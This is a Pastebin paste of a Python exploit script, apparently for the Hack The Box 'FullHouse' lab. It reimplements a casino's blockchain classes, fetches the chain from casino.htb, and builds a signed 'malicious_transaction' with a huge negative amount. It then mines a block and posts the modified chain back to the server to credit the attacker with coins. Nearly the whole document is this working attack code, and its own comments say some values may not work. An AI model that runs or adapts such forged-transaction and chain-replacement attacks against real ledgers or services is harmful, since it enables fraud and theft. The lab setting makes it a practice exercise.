API tools faq
paste
Guest User

HTB FUllhOUSE script

a guest
Aug 25th, 2024
471
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.71 KB | None | 0 0
raw download clone embed print report
  1. import requests
  2. import time
  3. import json
  4. import base64
  5. from copy import deepcopy
  6. from collections import OrderedDict
  7. from hashlib import sha512
  8. from Crypto.PublicKey import RSA
  9. from Crypto.Hash import SHA
  10. from Crypto.Signature import PKCS1_v1_5
  11.  
  12. BLOCKCHAIN_URL = "http://casino.htb/blockchain"
  13.  
  14. class Blockchain:
  15. def __init__(self, bank_address):
  16. self.genesis_block = Block({'index': 0, 'previous_hash': 1, 'transactions': [], 'nonce': 0, 'timestamp': 0})
  17. self.bank_address = bank_address
  18. genesis_transaction = Transaction(sender_address="0", receiver_address=bank_address, amount=4,
  19. transaction_inputs='', is_genesis=True, user_id='0')
  20. self.genesis_block.transactions.append(genesis_transaction)
  21. self.genesis_block.current_hash = self.genesis_block.get_hash()
  22. self.block_chain = [self.genesis_block]
  23.  
  24. def add_block(self, new_block):
  25. if self.validate_block(new_block, 1):
  26. self.block_chain.append(new_block)
  27. return self
  28.  
  29. def mine_block(self, block_to_mine, difficulty):
  30. nonce = 0
  31. block_to_mine.nonce = nonce
  32. block_hash = block_to_mine.get_hash()
  33. while block_hash[:difficulty] != '0' * difficulty:
  34. nonce += 1
  35. block_to_mine.nonce = nonce
  36. block_hash = block_to_mine.get_hash()
  37. block_to_mine.current_hash = block_hash
  38. self.add_block(block_to_mine)
  39.  
  40. def to_json(self):
  41. return json.dumps(OrderedDict([('blockchain', [block.to_ordered_dict() for block in self.block_chain])]), default=str)
  42.  
  43. def validate_block(self, block, difficulty, is_new_chain=False):
  44. if difficulty * "0" != block.get_hash_obj().hexdigest()[:difficulty]:
  45. return False
  46. transaction_to_test = deepcopy(block.transactions[0])
  47. transaction_to_test.signature = ""
  48. transaction_to_test = transaction_to_test.to_json()
  49. hash_object = SHA.new(transaction_to_test.encode('utf8'))
  50. sender_public_key = block.transactions[0].sender_address
  51. public_key = RSA.importKey(sender_public_key)
  52. verifier = PKCS1_v1_5.new(public_key)
  53. if not verifier.verify(hash_object, base64.b64decode(block.transactions[0].signature)):
  54. return False
  55. if block.transactions[0].receiver_address != self.genesis_block.transactions[0].receiver_address \
  56. and block.transactions[0].receiver_address != block.transactions[0].sender_address \
  57. and block.transactions[0].sender_address != self.genesis_block.transactions[0].receiver_address:
  58. return False
  59. if not is_new_chain:
  60. if self.block_chain[-1].current_hash != block.previous_hash and block.index != 0:
  61. if block.transactions[0].sender_address == self.genesis_block.transactions[0].receiver_address:
  62. block.previous_hash = self.block_chain[-1].current_hash
  63. self.mine_block(block, 1)
  64. return False
  65. return True
  66.  
  67. class Block:
  68. def __init__(self, block_data):
  69. self.index = block_data['index']
  70. self.timestamp = block_data['timestamp']
  71. self.transactions = block_data['transactions']
  72. self.nonce = block_data['nonce']
  73. self.previous_hash = block_data['previous_hash']
  74. self.current_hash = None
  75.  
  76. def to_ordered_dict(self):
  77. return OrderedDict([
  78. ('index', self.index),
  79. ('timestamp', self.timestamp),
  80. ('transactions', ([self.transaction_to_ordered_dict(trans) for trans in self.transactions])),
  81. ('nonce', self.nonce),
  82. ('previous_hash', self.previous_hash)
  83. ])
  84.  
  85. def transaction_to_ordered_dict(self, transaction):
  86. try:
  87. return OrderedDict([
  88. ('sender_address', transaction["sender_address"]),
  89. ('receiver_address', transaction["receiver_address"]),
  90. ('amount', transaction["amount"]),
  91. ('transaction_id', transaction["transaction_id"]),
  92. ('transaction_inputs', transaction["transaction_inputs"]),
  93. ('transaction_outputs', transaction["transaction_outputs"]),
  94. ("signature", transaction["signature"]),
  95. ("change", transaction["change"]),
  96. ("user_id", transaction["user_id"])])
  97. except:
  98. return transaction.to_ordered_dict()
  99.  
  100. def to_json(self):
  101. return json.dumps(self.to_ordered_dict(), default=str)
  102.  
  103. def get_hash(self):
  104. return self.get_hash_obj().hexdigest()
  105.  
  106. def get_hash_obj(self):
  107. return sha512(str(self.to_json()).encode('utf-8'))
  108.  
  109. class Transaction:
  110. transaction_counter = 0
  111.  
  112. def __init__(self, sender_address, receiver_address, amount, transaction_inputs, user_id, is_genesis=False):
  113. self.sender_address = sender_address
  114. self.receiver_address = receiver_address
  115. self.amount = amount
  116. self.transaction_id = str(user_id) + str(Transaction.transaction_counter)
  117. self.transaction_inputs = transaction_inputs
  118. self.transaction_outputs = []
  119. self.signature = ''
  120. self.change = 0
  121. self.user_id = user_id
  122.  
  123. if not is_genesis:
  124. total_utxo = 10000
  125. self.change = total_utxo - self.amount
  126. if self.change < 0:
  127. self.change = 0
  128. else:
  129. self.change = -self.amount
  130. self.transaction_outputs.append(
  131. {str(self.user_id) + str(Transaction.transaction_counter): (self.receiver_address, self.amount)})
  132. Transaction.transaction_counter += 1
  133. self.transaction_outputs.append(
  134. {str(self.user_id) + str(Transaction.transaction_counter): (self.sender_address, self.change)})
  135. else:
  136. self.transaction_outputs.append({"0" + str(Transaction.transaction_counter): (self.receiver_address, self.amount)})
  137. Transaction.transaction_counter += 1
  138.  
  139. def to_ordered_dict(self):
  140. return OrderedDict([
  141. ('sender_address', self.sender_address),
  142. ('receiver_address', self.receiver_address),
  143. ('amount', self.amount),
  144. ('transaction_id', self.transaction_id),
  145. ('transaction_inputs', self.transaction_inputs),
  146. ('transaction_outputs', self.transaction_outputs),
  147. ('signature', self.signature),
  148. ('change', self.change),
  149. ('user_id', self.user_id)
  150. ])
  151.  
  152. def to_json(self):
  153. return json.dumps(self.to_ordered_dict(), default=str)
  154.  
  155. def sign_transaction(self, private_key):
  156. private_key_obj = RSA.importKey(private_key)
  157. signer = PKCS1_v1_5.new(private_key_obj)
  158. transaction_data = self.to_ordered_dict()
  159. hash_object = SHA.new(json.dumps(transaction_data, default=str).encode('utf8'))
  160. self.signature = base64.b64encode(signer.sign(hash_object)).decode('utf8')
  161.  
  162. # User's private and public keys
  163. user_private_key = """ add private key here
  164. """
  165.  
  166. user_public_key = """ add public key here """
  167.  
  168. # Fetch current blockchain data from the server
  169. blockchain_data = json.loads(requests.get("http://casino.htb/view_blockchain").text)
  170.  
  171. bank_wallet_address = blockchain_data['blockchain'][0]['transactions'][0]['receiver_address']
  172. current_blockchain = Blockchain(bank_wallet_address)
  173. blockchain_blocks = []
  174. for block_data in blockchain_data['blockchain']:
  175. new_block = Block(block_data)
  176. new_block.current_hash = new_block.get_hash()
  177. blockchain_blocks.append(new_block)
  178. current_blockchain.block_chain = blockchain_blocks
  179.  
  180. # Create a malicious transaction
  181. malicious_transaction = Transaction(
  182. sender_address=user_public_key,
  183. receiver_address=bank_wallet_address,
  184. amount=-9999999999, # This negative value may not work, adjust it based on actual blockchain logic
  185. transaction_inputs={"0": -9999999999}, # This might also need to be realistic UTXO
  186. user_id=2
  187. )
  188. malicious_transaction.sign_transaction(user_private_key)
  189.  
  190. # Create a new block with the malicious transaction
  191. transactions = [malicious_transaction]
  192.  
  193. new_block = Block({
  194. 'index': len(current_blockchain.block_chain),
  195. 'timestamp': time.time(),
  196. 'transactions': transactions,
  197. 'nonce': 0, # Start with 0, mining will set it correctly
  198. 'previous_hash': current_blockchain.block_chain[-1].get_hash()
  199. })
  200. current_blockchain.mine_block(new_block, 1)
  201.  
  202. # Submit the modified blockchain to the server
  203. response = requests.post(BLOCKCHAIN_URL, json=current_blockchain.to_json())
  204.  
  205. # Check the response
  206. if response.status_code == 200:
  207. print("[±] Check your Coins !!")
  208. else:
  209. print("[!] Check Website !!")
  210.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!